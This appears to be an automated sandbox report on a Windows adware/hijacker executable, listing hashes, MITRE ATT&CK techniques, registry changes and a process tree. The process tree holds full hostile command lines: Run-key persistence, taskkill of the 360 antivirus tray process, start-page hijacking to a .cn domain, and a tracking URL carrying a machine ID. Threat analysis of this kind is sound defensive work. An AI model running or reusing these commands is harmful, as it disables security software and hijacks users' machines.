817334993b2e6b8ebc706fd3bb85009ab2d080d96eaf5d4623aaac1d994c87cd

Analysis

max time kernel
120s
max time network
136s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
24/02/2024, 13:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a1f007ba1e1a6a923321e96151a68eda.exe
Size

16KB
MD5

a1f007ba1e1a6a923321e96151a68eda
SHA1

b260ec79285d161a97cb2903f27420fbc8f73a1d
SHA256

817334993b2e6b8ebc706fd3bb85009ab2d080d96eaf5d4623aaac1d994c87cd
SHA512

054373b4f0515bb016b36b8fd9438d90b5971c11cb3da4631c43fdd0277202c4f4865d26022190296a9117f72c7a4d7b87a40811bea3e36ca1fdd47cb7335fd8
SSDEEP

384:8kFxsvdNjI628MuHPntb0J4PfIWgpBz5qrDuQS/B:xFxslNZ6uvtb0J4oWgpMiN

Score

7^/10

persistence

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
2448	cmd.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o"	rundll32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\360antiarp = "c:\\windows\\system32\\360antiarp.exe"	reg.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\SysWOW64\360antiarp.exe	a1f007ba1e1a6a923321e96151a68eda.exe
File created	\??\c:\windows\SysWOW64\360antiarp.exe	a1f007ba1e1a6a923321e96151a68eda.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.app.log	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	runonce.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	runonce.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2088	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 35 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000737305fab79e79faf08957dce984dc6e7cd4f82999c2d852238c79b3782d0b3b000000000e80000000020000200000003779c3582e324236d26ff0ece98e0a44ee35d447a88d2d77f28bf54d3864c2f49000000053adf531991550e4dceb43d062e0a448537c57ac44d4abcbc6e7f4356db42b6c07625af15854b88e75b61505a707a967f83b0807de9c51e475432617c8f9ef50406294897fd2f05893e4b119bc9600b3ee0295cf3353b65f079e893d4821733fddcba2942c67d40258d9bf5a3f172b0e532b3412c1280dd599f6bb2b13ea3d1adf8a2dfa1828035fe1b306a422ea6abf40000000ab809469f2f9a6f2aa58fd52d2a942c388f19352bdc37ef9dbf24287fd1bda9c71cf7aa38316bfc60cbd2ca165d42fcc4c1b9c8c36e7989d186ee1cdff3f9344	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3C4BADF1-D316-11EE-B35F-5267BFD3BAD1} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a062382c2367da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "414942164"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000705cf62145233a6886315168502e7dc0ae48577287bb1c8a2286e1e61ab1d432000000000e8000000002000020000000c479f10b8a3a8273e552348fbce98e5bfd96e920dc3055dbe93873cebd69def02000000041ae05ea64406f1ddabf59a4ff6bf08763df23458b96810f38f78b0e8d1310c6400000007e0d859dac76052b550c733e6be8c89c4b018c9aa16aa02aa6e7605bd2b7f4decc0aa55352bf23ab34e59745bf939964c4fdb1f5b13d493467cd2d3cc3d4153c	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "Http://WWW.955887.cn"	reg.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage	reg.exe

Runs .reg file with regedit 1 IoCs

pid	Process
2396	regedit.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeRestorePrivilege	2592	rundll32.exe
Token: SeRestorePrivilege	2592	rundll32.exe
Token: SeRestorePrivilege	2592	rundll32.exe
Token: SeRestorePrivilege	2592	rundll32.exe
Token: SeRestorePrivilege	2592	rundll32.exe
Token: SeRestorePrivilege	2592	rundll32.exe
Token: SeRestorePrivilege	2592	rundll32.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2180	a1f007ba1e1a6a923321e96151a68eda.exe
836	iexplore.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2180	a1f007ba1e1a6a923321e96151a68eda.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2180	a1f007ba1e1a6a923321e96151a68eda.exe
836	iexplore.exe
836	iexplore.exe
2544	IEXPLORE.EXE
2544	IEXPLORE.EXE
2544	IEXPLORE.EXE
2544	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2180 wrote to memory of 784	2180	a1f007ba1e1a6a923321e96151a68eda.exe	28
PID 2180 wrote to memory of 784	2180	a1f007ba1e1a6a923321e96151a68eda.exe	28
PID 2180 wrote to memory of 784	2180	a1f007ba1e1a6a923321e96151a68eda.exe	28
PID 2180 wrote to memory of 784	2180	a1f007ba1e1a6a923321e96151a68eda.exe	28
PID 784 wrote to memory of 2396	784	cmd.exe	30
PID 784 wrote to memory of 2396	784	cmd.exe	30
PID 784 wrote to memory of 2396	784	cmd.exe	30
PID 784 wrote to memory of 2396	784	cmd.exe	30
PID 2180 wrote to memory of 284	2180	a1f007ba1e1a6a923321e96151a68eda.exe	31
PID 2180 wrote to memory of 284	2180	a1f007ba1e1a6a923321e96151a68eda.exe	31
PID 2180 wrote to memory of 284	2180	a1f007ba1e1a6a923321e96151a68eda.exe	31
PID 2180 wrote to memory of 284	2180	a1f007ba1e1a6a923321e96151a68eda.exe	31
PID 2180 wrote to memory of 2272	2180	a1f007ba1e1a6a923321e96151a68eda.exe	33
PID 2180 wrote to memory of 2272	2180	a1f007ba1e1a6a923321e96151a68eda.exe	33
PID 2180 wrote to memory of 2272	2180	a1f007ba1e1a6a923321e96151a68eda.exe	33
PID 2180 wrote to memory of 2272	2180	a1f007ba1e1a6a923321e96151a68eda.exe	33
PID 2272 wrote to memory of 2872	2272	cmd.exe	35
PID 2272 wrote to memory of 2872	2272	cmd.exe	35
PID 2272 wrote to memory of 2872	2272	cmd.exe	35
PID 2272 wrote to memory of 2872	2272	cmd.exe	35
PID 284 wrote to memory of 2088	284	cmd.exe	36
PID 284 wrote to memory of 2088	284	cmd.exe	36
PID 284 wrote to memory of 2088	284	cmd.exe	36
PID 284 wrote to memory of 2088	284	cmd.exe	36
PID 2272 wrote to memory of 3012	2272	cmd.exe	37
PID 2272 wrote to memory of 3012	2272	cmd.exe	37
PID 2272 wrote to memory of 3012	2272	cmd.exe	37
PID 2272 wrote to memory of 3012	2272	cmd.exe	37
PID 2272 wrote to memory of 2592	2272	cmd.exe	38
PID 2272 wrote to memory of 2592	2272	cmd.exe	38
PID 2272 wrote to memory of 2592	2272	cmd.exe	38
PID 2272 wrote to memory of 2592	2272	cmd.exe	38
PID 2272 wrote to memory of 2592	2272	cmd.exe	38
PID 2272 wrote to memory of 2592	2272	cmd.exe	38
PID 2272 wrote to memory of 2592	2272	cmd.exe	38
PID 2180 wrote to memory of 836	2180	a1f007ba1e1a6a923321e96151a68eda.exe	39
PID 2180 wrote to memory of 836	2180	a1f007ba1e1a6a923321e96151a68eda.exe	39
PID 2180 wrote to memory of 836	2180	a1f007ba1e1a6a923321e96151a68eda.exe	39
PID 2180 wrote to memory of 836	2180	a1f007ba1e1a6a923321e96151a68eda.exe	39
PID 2592 wrote to memory of 2888	2592	rundll32.exe	40
PID 2592 wrote to memory of 2888	2592	rundll32.exe	40
PID 2592 wrote to memory of 2888	2592	rundll32.exe	40
PID 2592 wrote to memory of 2888	2592	rundll32.exe	40
PID 836 wrote to memory of 2544	836	iexplore.exe	41
PID 836 wrote to memory of 2544	836	iexplore.exe	41
PID 836 wrote to memory of 2544	836	iexplore.exe	41
PID 836 wrote to memory of 2544	836	iexplore.exe	41
PID 2180 wrote to memory of 2640	2180	a1f007ba1e1a6a923321e96151a68eda.exe	42
PID 2180 wrote to memory of 2640	2180	a1f007ba1e1a6a923321e96151a68eda.exe	42
PID 2180 wrote to memory of 2640	2180	a1f007ba1e1a6a923321e96151a68eda.exe	42
PID 2180 wrote to memory of 2640	2180	a1f007ba1e1a6a923321e96151a68eda.exe	42
PID 2180 wrote to memory of 2652	2180	a1f007ba1e1a6a923321e96151a68eda.exe	44
PID 2180 wrote to memory of 2652	2180	a1f007ba1e1a6a923321e96151a68eda.exe	44
PID 2180 wrote to memory of 2652	2180	a1f007ba1e1a6a923321e96151a68eda.exe	44
PID 2180 wrote to memory of 2652	2180	a1f007ba1e1a6a923321e96151a68eda.exe	44
PID 2180 wrote to memory of 2672	2180	a1f007ba1e1a6a923321e96151a68eda.exe	45
PID 2180 wrote to memory of 2672	2180	a1f007ba1e1a6a923321e96151a68eda.exe	45
PID 2180 wrote to memory of 2672	2180	a1f007ba1e1a6a923321e96151a68eda.exe	45
PID 2180 wrote to memory of 2672	2180	a1f007ba1e1a6a923321e96151a68eda.exe	45
PID 2180 wrote to memory of 2568	2180	a1f007ba1e1a6a923321e96151a68eda.exe	46
PID 2180 wrote to memory of 2568	2180	a1f007ba1e1a6a923321e96151a68eda.exe	46
PID 2180 wrote to memory of 2568	2180	a1f007ba1e1a6a923321e96151a68eda.exe	46
PID 2180 wrote to memory of 2568	2180	a1f007ba1e1a6a923321e96151a68eda.exe	46
PID 2180 wrote to memory of 2520	2180	a1f007ba1e1a6a923321e96151a68eda.exe	54

C:\Users\Admin\AppData\Local\Temp\a1f007ba1e1a6a923321e96151a68eda.exe
"C:\Users\Admin\AppData\Local\Temp\a1f007ba1e1a6a923321e96151a68eda.exe"
1⤵
- Drops file in System32 directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2180
- C:\Windows\SysWOW64\cmd.exe
  cmd /c a.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:784
- - C:\Windows\SysWOW64\regedit.exe
    regedit /s c:\safemon.reg
    3⤵
    - Runs .reg file with regedit
    PID:2396
- C:\Windows\SysWOW64\cmd.exe
  cmd /c c:\1.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:284
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im 360tray.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  cmd /c shanie.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2272
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32 SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\TmpInf.inf
    3⤵
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2592
  - - C:\Windows\SysWOW64\runonce.exe
      "C:\Windows\system32\runonce.exe" -r
      4⤵
      Checks processor information in registry
      PID:2888
    - - C:\Windows\SysWOW64\grpconv.exe
        
        "C:\Windows\System32\grpconv.exe" -o
        5⤵
        
        PID:2120
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://WWW.955887.cn/tongji/count/count.asp?id=52-67-BF-D3-BA-D1&ver=1.0
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:836
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:836 CREDAT:275457 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2544
- C:\Windows\SysWOW64\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Homepage /t REG_DWORD /d 0x00000000 /f
  2⤵
  PID:2640
- C:\Windows\SysWOW64\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\main" /v "Start Page" /t REG_SZ /d Http://WWW.955887.cn /f
  2⤵
  - Modifies Internet Explorer settings
  - Modifies Internet Explorer start page
  PID:2652
- C:\Windows\SysWOW64\reg.exe
  reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /t REG_EXPAND_SZ /d "C:\Program Files\Internet Explorer\iexplore.exe Http://WWW.955887.cn" /f
  2⤵
  - Modifies registry class
  PID:2672
- C:\Windows\SysWOW64\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v Homepage /t REG_DWORD /d 0x00000001 /f
  2⤵
  PID:2568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c a.bat
  2⤵
  - Deletes itself
  PID:2448
- C:\Windows\SysWOW64\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 360antiarp /t REG_SZ /d "c:\windows\system32\360antiarp.exe" /f
  2⤵
  - Adds Run key to start application
  PID:2520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\TmpInf.inf

Filesize
58B

MD5
ef482bb78b8fff6cf20ec2ff9a677a93

SHA1
7613c5c62b89e63dc686c0f4007c4a77a4a77335

SHA256
7fc3b374408af4dac1e4c39fc1218c98cb692241fd2a753ed169627e70f1536d

SHA512
b4f00ef86cf8fa09517eb09d16d448d45363b87973fe346b3b6b6e9c3c41e087ede8c1a9aa0934fc1abd4d0fb01b853ec501c3bca5483a539c8d28607fd45166

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e0fb6db353ee4a46b1ec8d0cc8e09040

SHA1
2feeb5077dff7fb55efd2737a8566b099a55b63b

SHA256
5bd04f21a94d3beca1aafa9b920af8490413dbee9146daef2826c236791c7599

SHA512
6a56bc329b26b8257497b31db5e49a39f2edc2a28b5cb814bfc131d6875f16f116a1ee90876762cc4f1a0db1da51a56e77cc7766a6e40a6848adc6bbae9c6db7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f1cdfd57a9cba6b80a28635948464aca

SHA1
fc55b0769480f17769e4d288fdd350bbfd1c5f53

SHA256
6bfd28434ff14f6619111ab1bc434a46c04c55d40e6642dedbd09af07b0c3771

SHA512
da8bcea1d95a5fde88d89b4e1ab3fc6c15930f57a3568ae79be6a5216ad52681233c44fb567f80cc8a75c38627507324b0dc966b88d9b2f0bf65986198662e38

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a9314f9e6cf21244f01cfb3ba265e049

SHA1
963c0226c4812a166c7a2bef445b7839fa6974f1

SHA256
2e71afba6e49c0a4181bf98736f6b5bbb8eb870dbcaa5d94f3d59376a4ed8e64

SHA512
80fe7f5630a94dceecd4c97bfde98f2dff2e7135edd8cd2177fc59650112cfae9a57fe802d3ed732a876a2d18301000998c5d83f17ab7e92d41a29c9da9d589e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
39783f2e13f9c8ac2640fe96bed11612

SHA1
f9bd15df6d715c183e04d43be13ecaca0c7a9e4e

SHA256
63b2381d7d46149c1eed3460532c1511cb466fc5001c1a1a5a56136b425d3acb

SHA512
ea50201e44d8157d099153d6b887110e955cebf7f49b4e7c3d5ade9d88a6462d89f6db7928c445e621824aa11b7bf6bd797e0491997bf529d59885444a38a7d4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1aacfa20fcd90a6c401302939a7dee0a

SHA1
73c40ae17c5db33eaa989878af60419ec455f8e8

SHA256
8ef4729ba223aa8717f399a33e37b3d31e6b12c945a25a0cc1b9d14f5477f1fb

SHA512
e7cf44f89812bb45cdcadcb88ccd583297379d05601aab8fb8603d88e2d6e742f89957532e76a018487693b3c092268ce9beb87d2eb2d7503dd41cef8e3c053e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
45f1034061d84952ce0d6c9301526f30

SHA1
4bd74a1f51da9b14968965735cade0055e205764

SHA256
dc95df0e629d8d404372ac1246b358d5fc726223dd02313fd2af351f80f0da97

SHA512
a351f5411e53e8ff72c127207e28dc22836f776ec54c9114d623a5579ce4048278945ff5a92ced552acacfaa84b754233b29694f6070e2c9256385825b6e585f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
89e0fa1264854e1778c9b2541887f076

SHA1
101b9ab0ef041d2812de8f01bcd30dab1036f73e

SHA256
d577ddcd70e90d372a414bd0d6a8533f870d3f433067277a586432f35efb9480

SHA512
ac529f3358c112b922805bd0b5908a250ebc9ce9b83e1bccaec50d62f2fe90731e18e7bc69ae270169db910abb7ec7e49b2eb55e1794d2ae85db4203cad47874

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
598cc9ac440c0db1e75385f69eba5375

SHA1
9c938b8e115e094c547cbfab3a682185cb3dac6b

SHA256
38bba30e6a51a6093a7678aaac33ff78d6216dd9a2e71253c6d548bf6b09b4ef

SHA512
329eaecdd4e6383ced95c83f2d4d2c9baa42b304b3eff0e997033ad03af39494258988beff875758097ad186cb1ae5c1e7976eedf47ef34167f0cfab26285c46

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
68dcfd965203fc36e3781b5ef117f9b2

SHA1
882cc1c75703bd4379d517f59f58c23d802c4fb6

SHA256
a762fd3c8f93f9a5ea8b10942b621e3ec53a42f7a12ec689cbaf6187c0c4556b

SHA512
677961457d94c5f05dc4b1d65904500d8b1d1be6a3ccc20c91f0fae02eab24465282d869c815263f2af21d77098be46f59137d07fc1a6bd6a52aca938b7ce3b6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
2ac1ffcd4ffaf07d9f1d06c2b48a60e0

SHA1
1d7db215a352fc5e61b126ec8526d53a6eb6e03f

SHA256
0fb4d951cafc778fb7de929194ec1779a476aa94881dd41383b645374dcf237d

SHA512
cefe264a0a74854670c1ed0d6a90faa04a5009e22a32728540befdee12c564515ec42bb9ad243c7e81bd9e33d7f31764db2fcf9f3ed32f3bf7d1db5dfc7bf275

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e14e4fa6bf17b1c141f31e4aba27833e

SHA1
25d57a6a14008bef52f8f7e988c97ad1b91da24a

SHA256
d6ee8028935ee533435e57e88f43f698bb2c03acca3d24ae8c42a1875fe34a60

SHA512
9ba438dd0a94fe728e4ca67ba43787ac19add8ac6bbab998d72babc301b6904ffffad58ee784ddabb8c531312937bb306449e72eef77fa9f38ade96d894c08a6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
2698250647dba5bcc7b0a57cdfe9235d

SHA1
83cd7c2975d5b70e857d925140b27e6d01bf4fd0

SHA256
86ee2ff0d2bf7135bdec3a95a661942e237761f5b0b64a669cc03a5d0702b21d

SHA512
a295868f5a9f9fb72e4301d43d6dd0e93f9b38cca7c72edcf6265297e499fac074564551dd715c7c5e128da7ef2bab225d0a576f41c9ffa43a0a6c28282cf768

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
eb74219af3bef21182a596eb22078ffc

SHA1
6a1deace902f1d81edb335832ca43aef86e13882

SHA256
d64ca0b253052f8d73ea5893861c01524216bf1afb0c6230e65f147f4d8f2521

SHA512
f118461b78c94f9e1752995a2d107d227f7f77cf41b9e64106e9f7dd2516bbdc441d99aeb90a839f39e34d2dcd6e9be4758d521256ac15ddc027f143e6e2b8b8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
3c821d18a6122daab86575496cc9740d

SHA1
aae3c947d46534c4f97a213cc9fc7ceeea70cc82

SHA256
5516a71e49286854ebac69517577d3a2acfb04c247c8a260b1befa3ae29b8852

SHA512
623a43061236cf102151bfe72b1350fba9b6389d66aa470c579c29c5891d48272f00e224c3743aa1d76c73e02de84d5e7e917d2be384cf850bf747f00b7ff490

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
de188b6da499259457e223924a4d3dbf

SHA1
e167822d9d70ffa97294bb526d93039968af9159

SHA256
07bce1f1253b449c88670253e0b519affe8c6b82fa7e3ee9e083ac629babad60

SHA512
